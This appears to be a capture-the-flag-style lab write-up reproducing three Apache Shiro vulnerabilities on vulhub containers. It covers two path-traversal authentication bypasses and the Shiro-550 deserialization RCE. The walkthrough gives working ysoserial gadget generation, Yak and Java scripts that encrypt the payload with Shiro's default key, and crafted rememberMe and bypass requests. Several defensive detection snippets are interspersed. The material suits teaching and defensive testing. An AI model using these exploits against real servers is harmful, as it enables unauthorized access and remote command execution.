Contents
CVE-2010-3863 (Shiro authentication bypass)
Visit the lab's main page in a browser
Capture the request with Yakit
Fuzz the root path of port 8080 on the target with ffuf
CVE-2016-4437 (Shiro-550)
Visit the lab's main page in a browser
Capture the request with Yakit
Exploit with the Yso-Java Hack tool bundled in Yakit's reverse-connection module
First run the script to generate a payload (malicious serialized data)
Then encrypt that data in CBC mode with the AES key
Copy the payload into the WebFuzzer module for manual exploitation
Exploit with the automated Yak script generated by Yso-Java Hack
CVE-2020-1957 (Shiro authentication bypass)
Visit the lab's main page in a browser
Fuzz the root path of port 8080 on the target with ffuf
Capture the request with Yakit
CVE-2010-3863 (Shiro authentication bypass)
Start the vulnerable environment
```
docker-compose up -d
```
Read the documentation vulhub provides for this vulnerability
# Apache Shiro authentication bypass (CVE-2010-3863)
Apache Shiro is an open-source security framework that provides authentication, authorization, cryptography and session management. Shiro is intuitive and easy to use while still providing robust security.
In Apache Shiro versions before 1.1.0, Shiro does not normalize the URL before performing the permission check, so an attacker can construct paths containing `/`, `//`, `/./`, `/../` and similar sequences to bypass the check.
References:
- <https://github.com/apache/shiro/commit/ab8294940a19743583d91f0c7e29b405d197cc34>
- <https://xz.aliyun.com/t/11633#toc-2>
- <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3863>
## Environment setup
Run the following command to start an application that ships Shiro 1.0.0:
```
docker compose up -d
```
Once the environment is up, visit `http://your-ip:8080` to see the home page.
## Reproduction
Requesting the admin page `/admin` directly is denied and redirects to the login page:
![](1.png)
Crafting the request `/./admin` bypasses the permission check and reaches the admin page:
![](2.png)
Searching CNNVD for information on this vulnerability
The official CVE summary:
Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
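As an added illustration of the root cause (this is not code from the page or from Shiro), the Go snippet below models the filter-chain match before and after the fix: the raw request URI compared with the `/admin` entry as the client sent it, versus the same match after `.`, `..` and repeated slashes are canonicalized away. The entry list, the function names and the `path.Clean`-based canonicalization are assumptions of this example.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// Filter-chain entries that require authentication, modelled on the shiro.ini
// rule that protects /admin in the lab (constructed for this example).
var authcPaths = []string{"/admin"}

// matchesRaw models Shiro before 1.1.0: the request URI is compared with the
// chain entries exactly as the client sent it, so "/./admin" is not "/admin".
func matchesRaw(requestURI string) bool {
	for _, entry := range authcPaths {
		if requestURI == entry || strings.HasPrefix(requestURI, entry+"/") {
			return true
		}
	}
	return false
}

// canonicalize does what the fix adds before matching: resolve "." and ".."
// segments and collapse repeated slashes so every spelling of a resource maps
// to one path. path.Clean keeps the result rooted, so ".." cannot climb above /.
func canonicalize(requestURI string) string {
	return path.Clean("/" + strings.TrimLeft(requestURI, "/"))
}

// matchesFixed models Shiro 1.1.0 and later: canonicalize first, then match.
func matchesFixed(requestURI string) bool {
	return matchesRaw(canonicalize(requestURI))
}

// bypassSpellings are the variants the page lists for CVE-2010-3863.
var bypassSpellings = []string{"/./admin", "//admin", "/x/../admin", "/../admin"}

func main() {
	for _, u := range bypassSpellings {
		fmt.Printf("%-12s raw=%-5v fixed=%v (canonical %s)\n", u, matchesRaw(u), matchesFixed(u), canonicalize(u))
	}
}
```

The same canonical form should also be used for logging and for any WAF rule, otherwise a rule written for `/admin` sees none of these spellings.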
Visit the lab's main page in a browser
Capture the request with Yakit
```
POST /doLogin HTTP/1.1
Host: 192.168.1.138:8080
Origin: http://192.168.1.138:8080
Priority: u=0, i
Referer: http://192.168.1.138:8080/doLogin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 25

username=123&password=456
```
After replaying this packet, I observed the Shiro signature `Set-Cookie: rememberMe=deleteMe;` in the response headers
```
HTTP/1.1 200
Set-Cookie: rememberMe=deleteMe; Path=/; Expires=Tue, 03-Dec-2024 14:51:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: zh-CN
Date: Wed, 04 Dec 2024 14:51:35 GMT
Content-Length: 2632
```
Fuzz the root path of port 8080 on the target with ffuf
```
ffuf -u http://192.168.1.138:8080/FUZZ -w ../../../dictionary/Common-dir.txt
```
I crafted the request to try accessing /admin directly
```
POST /admin HTTP/1.1
Host: 192.168.1.138:8080
Content-Type: application/x-www-form-urlencoded
Priority: u=0, i
Origin: http://192.168.1.138:8080
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.138:8080/doLogin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 25
```
Replaying it returns the following response
```
HTTP/1.1 302
Set-Cookie: JSESSIONID=AEEC9AFE4B1916B5542E1E81F06C0AE5; Path=/; HttpOnly
Location: http://192.168.1.138:8080/login;jsessionid=AEEC9AFE4B1916B5542E1E81F06C0AE5
Date: Wed, 04 Dec 2024 14:55:10 GMT
```
Following the official CVE description, I tried prefixing the /admin endpoint with "/."
```
POST /./admin HTTP/1.1
Host: 192.168.1.138:8080
Content-Type: application/x-www-form-urlencoded
Priority: u=0, i
Origin: http://192.168.1.138:8080
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.138:8080/doLogin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 25
```
Sending the packet again returns the following response
```
HTTP/1.1 200
Content-Type: text/html; charset=UTF-8
Content-Language: zh-CN
Date: Wed, 04 Dec 2024 14:57:14 GMT
Content-Length: 201

<!doctype html>
<html lang="en"><head><meta charset="UTF-8" /><title>Congrats</title></head><body><h1>Congrats</h1><p>You have successfully logged in</p></body>
</html>
```
The response "You have successfully logged in" shows that in a real environment we would pass the authentication check on the /admin endpoint
CVE-2016-4437 (Shiro-550)
Start the vulnerable environment
```
docker-compose up -d
```
Read the documentation vulhub provides for this vulnerability
# Apache Shiro 1.2.4 deserialization vulnerability (CVE-2016-4437)
Apache Shiro is an open-source security framework that provides authentication, authorization, cryptography and session management. Shiro is intuitive and easy to use while still providing robust security.
In Apache Shiro 1.2.4 and earlier, encrypted user information is serialized and stored in a cookie named remember-me. An attacker can forge a user cookie with Shiro's default key, trigger Java deserialization, and execute arbitrary commands on the target machine.
## Vulnerable environment
Run the following command to start a web service that uses Apache Shiro 1.2.4:
```
docker compose up -d
```
Once the service is up, visit `http://your-ip:8080` and log in with `admin:vulhub`.
## Reproduction
Generate a CommonsBeanutils1 gadget with ysoserial:
```
java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser
```
Encrypt the payload with Shiro's built-in default key:
```java
package org.vulhub.shirodemo;

import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.Base64;
import org.apache.shiro.io.DefaultSerializer;

import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;

public class TestRemember {
    public static void main(String[] args) throws Exception {
        // Read the serialized gadget produced by ysoserial
        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));

        // Encrypt it with Shiro's own AES cipher service under the hard-coded default key;
        // the output (IV followed by ciphertext) is printed base64-encoded
        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}
```
Send it as the rememberMe cookie and `touch /tmp/success` is executed:
![](1.png)
Visit the lab's main page in a browser
Capture the request with Yakit
Send the request without Remember me checked
Check Remember me and send the request again
Shiro <= 1.2.4 uses AES-CBC encryption with the fixed key: kPH+bIxk5D2deZiIxcaaaA==
I try to construct malicious serialized data and encrypt it with that key.
After BASE64 encoding it is sent to the server, which decodes and decrypts it layer by layer and then deserializes the data.
If the server does not filter or recognize this malicious data, I can execute arbitrary commands on the server (RCE)
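As an added example (not code from the page, from Yakit or from Shiro), the following Go check lets a defender test whether a captured rememberMe cookie was produced with the default key quoted above: it inspects the IV block, which the page's script sets to the key itself, and performs a trial decryption with that key looking for the Java serialization header. The cookie layout assumed here is a 16-byte IV followed by AES-CBC ciphertext, and the test vector is constructed (a harmless marker, not a gadget).

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
)

// Hard-coded Shiro <= 1.2.4 rememberMe key quoted on the page.
const defaultKeyB64 = "kPH+bIxk5D2deZiIxcaaaA=="
// Java serialization stream header (STREAM_MAGIC + STREAM_VERSION).
var javaSerialMagic = []byte{0xAC, 0xED, 0x00, 0x05}

// inspectRememberMe splits a rememberMe cookie into IV || AES-CBC ciphertext and
// reports whether the IV is the default key (the page's script does this) and
// whether the default key decrypts it to a Java serialization stream.
func inspectRememberMe(cookie string) (ivIsKey, decrypts bool, err error) {
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil {
		return false, false, err
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return false, false, fmt.Errorf("not an AES-CBC blob")
	}
	key, _ := base64.StdEncoding.DecodeString(defaultKeyB64)
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	block, _ := aes.NewCipher(key)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return bytes.Equal(iv, key), bytes.HasPrefix(pt, javaSerialMagic), nil
}

// sampleCookie is a constructed test vector: a harmless marker that only starts
// with the serialization header, PKCS5-padded and encrypted with IV = key like
// the page's script. It carries no gadget chain.
func sampleCookie() string {
	key, _ := base64.StdEncoding.DecodeString(defaultKeyB64)
	msg := append(append([]byte{}, javaSerialMagic...), "constructed-marker"...)
	pad := aes.BlockSize - len(msg)%aes.BlockSize
	msg = append(msg, bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, _ := aes.NewCipher(key)
	ct := make([]byte, len(msg))
	cipher.NewCBCEncrypter(block, key).CryptBlocks(ct, msg)
	return base64.StdEncoding.EncodeToString(append(append([]byte{}, key...), ct...))
}

func main() {
	fmt.Println(inspectRememberMe(sampleCookie())) // true true <nil>
}
```

Either indicator on a production cookie means the deployment still relies on the published key; the fix is to upgrade past 1.2.4 and configure a per-deployment random key.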
Exploit with the Yso-Java Hack tool bundled in Yakit's reverse-connection module
After configuring the gadget chain, I try to create a file named 0dayhp under /tmp on the target
Click copy code, open Yak Runner and paste the code
First run the script to generate a payload (malicious serialized data)
```
log.setLevel("info")
gadgetObj, err = yso.GetGadget("CommonsBeanutils1", yso.useTemplate("RuntimeExec"), yso.obfuscationClassConstantPool(), yso.evilClassName("mhkuonUn"), yso.majorVersion(52), yso.useClassParam("cmd", "touch /tmp/0dayhp"))
if err {
    log.error("%v", err)
    return
}
gadgetBytes, err = yso.ToBytes(gadgetObj, yso.twoBytesCharString(), yso.dirtyDataLength(0))
if err {
    log.error("%v", err)
    return
}
// show the payload in hex
hexPayload = codec.EncodeToHex(gadgetBytes)
print(hexPayload)
```
The hex-encoded malicious serialized data was generated successfully
Next, encrypt the data in CBC mode with the AES key
```
log.setLevel("info")
gadgetObj, err = yso.GetGadget("CommonsBeanutils1", yso.useTemplate("RuntimeExec"), yso.obfuscationClassConstantPool(), yso.evilClassName("mhkuonUn"), yso.majorVersion(52), yso.useClassParam("cmd", "touch /tmp/0dayhp"))
if err {
    log.error("%v", err)
    return
}
gadgetBytes, err = yso.ToBytes(gadgetObj, yso.twoBytesCharString(), yso.dirtyDataLength(0))
if err {
    log.error("%v", err)
    return
}
// show the payload in hex
hexPayload = codec.EncodeToHex(gadgetBytes)
//(hexPayload)
// Shiro exploitation
// target = "127.0.0.1:8080"
base64Key = "kPH+bIxk5D2deZiIxcaaaA==" // base64-encoded key
key, _ = codec.DecodeBase64(base64Key) // derive the key bytes
payload = codec.PKCS5Padding(gadgetBytes, 16) // pad the payload for AES-CBC
encodePayload = codec.AESCBCEncrypt(key, payload, nil)[0]
finalPayload = codec.EncodeBase64(append(key, encodePayload...))
print(finalPayload)
```
The final payload is the base64 string printed by the script (omitted here)
Copy the payload into the WebFuzzer module for manual exploitation
```
POST /doLogin HTTP/1.1
Host: 192.168.1.138:8080
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=C9B098B3914070A665259F7AFF24211A; rememberMe=<payload omitted>
Referer: http://192.168.1.138:8080/login;jsessionid=C9B098B3914070A665259F7AFF24211A
Origin: http://192.168.1.138:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Length: 48

username=123&password=456&rememberme=remember-me
```
Sending it returns the following response headers
```
HTTP/1.1 200
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Fri, 06-Dec-2024 09:43:04 GMT
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Fri, 06-Dec-2024 09:43:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: zh-CN
Date: Sat, 07 Dec 2024 09:43:04 GMT
Content-Length: 2632
```
Now on the target, listing /tmp shows the file has been created
```
root@d0e8725db316:/tmp# ls
hsperfdata_root tomcat-docbase.2528687083482953528.8080 tomcat.6736820307613348021.8080
root@d0e8725db316:/tmp# ls
0dayhp hsperfdata_root tomcat-docbase.2528687083482953528.8080 tomcat.6736820307613348021.8080
```
Exploit with the automated Yak script generated by Yso-Java Hack
Use the shortcut "Ctrl+/" to quickly toggle the comments and change the target variable
```
log.setLevel("info")
gadgetObj, err = yso.GetGadget("CommonsBeanutils1", yso.useTemplate("RuntimeExec"), yso.obfuscationClassConstantPool(), yso.evilClassName("mhkuonUn"), yso.majorVersion(52), yso.useClassParam("cmd", "touch /tmp/0dayhp"))
if err {
    log.error("%v", err)
    return
}
gadgetBytes, err = yso.ToBytes(gadgetObj, yso.twoBytesCharString(), yso.dirtyDataLength(0))
if err {
    log.error("%v", err)
    return
}
// show the payload in hex
hexPayload = codec.EncodeToHex(gadgetBytes)
//(hexPayload)
// Shiro exploitation
target = "192.168.1.138:8080"
base64Key = "kPH+bIxk5D2deZiIxcaaaA==" // base64-encoded key
key, _ = codec.DecodeBase64(base64Key) // derive the key bytes
payload = codec.PKCS5Padding(gadgetBytes, 16) // pad the payload for AES-CBC
encodePayload = codec.AESCBCEncrypt(key, payload, nil)[0]
finalPayload = codec.EncodeBase64(append(key, encodePayload...))
rsp, req, _ = poc.HTTP(`GET /login HTTP/1.1
Host: {{params(target)}}
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Cookie: rememberMe={{params(payload)}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
`, poc.params({"payload": finalPayload, "target": target})) // send the payload
str.SplitHTTPHeadersAndBodyFromPacket(rsp)
log.info("发送Payload成功")
log.info("响应包: ", string(rsp))
```
Delete the /tmp/0dayhp file on the target
```
root@d0e8725db316:/tmp# rm 0dayhp
root@d0e8725db316:/tmp# ls
hsperfdata_root tomcat-docbase.2528687083482953528.8080 tomcat.6736820307613348021.8080
```
Run the Yak exploit script
Listing /tmp on the target again shows that 0dayhp was created successfully
```
root@d0e8725db316:/tmp# ls
hsperfdata_root tomcat-docbase.2528687083482953528.8080 tomcat.6736820307613348021.8080
root@d0e8725db316:/tmp# ls
0dayhp hsperfdata_root tomcat-docbase.2528687083482953528.8080 tomcat.6736820307613348021.8080
```
CVE-2020-1957 (Shiro authentication bypass)
Start the vulnerable environment
```
docker-compose up -d
```
Read the documentation vulhub provides for this vulnerability
```
cat README.zh-cn.md
```
# Apache Shiro authentication bypass (CVE-2020-1957)
Apache Shiro is an open-source security framework that provides authentication, authorization, cryptography and session management. Shiro is intuitive and easy to use while still providing robust security.
In Apache Shiro versions before 1.5.2, when Spring dynamic controllers are used, an attacker can construct a `..;` traversal to bypass Shiro's directory permission restrictions.
References:
- <https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#diff-98f7bc5c0391389e56531f8b3754081aL139>
- <https://xz.aliyun.com/t/8281>
- <https://blog.spoock.com/2020/05/09/cve-2020-1957/>
## Environment setup
Run the following command to start an application that ships Spring 2.2.2 and Shiro 1.5.1:
```
docker compose up -d
```
Once the environment is up, visit `http://your-ip:8080` to see the home page.
The application's URL permission configuration is as follows:
```java
@Bean
public ShiroFilterChainDefinition shiroFilterChainDefinition() {
    DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();
    chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form
    chainDefinition.addPathDefinition("/logout", "logout");
    chainDefinition.addPathDefinition("/admin/**", "authc");
    return chainDefinition;
}
```
## Reproduction
Requesting the admin page `/admin/` directly is denied and redirects to the login page:
![](1.png)
Crafting the request `/xxx/..;/admin/` bypasses the permission check and reaches the admin page:
![](2.png)
Visit the lab's main page in a browser
Fuzz the root path of port 8080 on the target with ffuf
```
ffuf -u http://192.168.1.138:8080/FUZZ -w ../../../dictionary/Common-dir.txt
```
Capture the request with Yakit
Changing the request path to /admin and trying to access it returns a 302
Construct the request following the vulhub documentation
```
GET /0dayhp/..;/admin/ HTTP/1.1
Host: 192.168.1.138:8080
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=ff3e50f3-53a3-4e96-b42e-7f70e25153ea
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.138:8080/
```
Sending it returns the response
Opening the page in the browser, the Logout button shows we are now in a logged-in state; the crafted /XXX/..;/admin/ request got us into the admin backend
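To show the root cause of this bypass from the defender's side, here is an added Go example (not from the page, from vulhub or from Shiro) that models how the servlet container resolves a path with `;` parameters and `..` segments before Spring routes it, and flags any request that reaches `/admin/**` through a raw path that a plain prefix match, as Shiro 1.5.1 applied it, would not have caught. The container model, the `/admin` prefix and the assumption that inputs are paths without a query string are this example's own.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// Protected path from the page's ShiroFilterChainDefinition ("/admin/**").
var protectedPrefixes = []string{"/admin"}

// dispatchPath models how the servlet container resolves a request path before
// Spring routes it: ";param" path parameters such as ;jsessionid are stripped
// from every segment, then "." and ".." segments and duplicate slashes collapse.
// Input is the path only (query string already removed).
func dispatchPath(rawPath string) string {
	segs := strings.Split(rawPath, "/")
	for i, s := range segs {
		if j := strings.IndexByte(s, ';'); j >= 0 {
			segs[i] = s[:j]
		}
	}
	return path.Clean("/" + strings.Join(segs, "/"))
}

// isProtected is the plain prefix match a filter chain applies to a path.
func isProtected(p string) bool {
	for _, pre := range protectedPrefixes {
		if p == pre || strings.HasPrefix(p, pre+"/") {
			return true
		}
	}
	return false
}

// Alert returns a reason when the container would dispatch the request to a
// protected path although the raw path, which is what Shiro 1.5.1 matched on,
// does not start with a protected prefix; "" means the two views agree.
func Alert(rawPath string) string {
	dp := dispatchPath(rawPath)
	if isProtected(dp) && !isProtected(rawPath) {
		return fmt.Sprintf("filter bypass: %q dispatched as %q", rawPath, dp)
	}
	return ""
}

func main() { fmt.Println(Alert("/0dayhp/..;/admin/")) }
```

Run over the path column of access logs this flags the request shown above while leaving ordinary `;jsessionid=` URLs under /admin alone, and the same check catches the `/./admin` spelling from CVE-2010-3863.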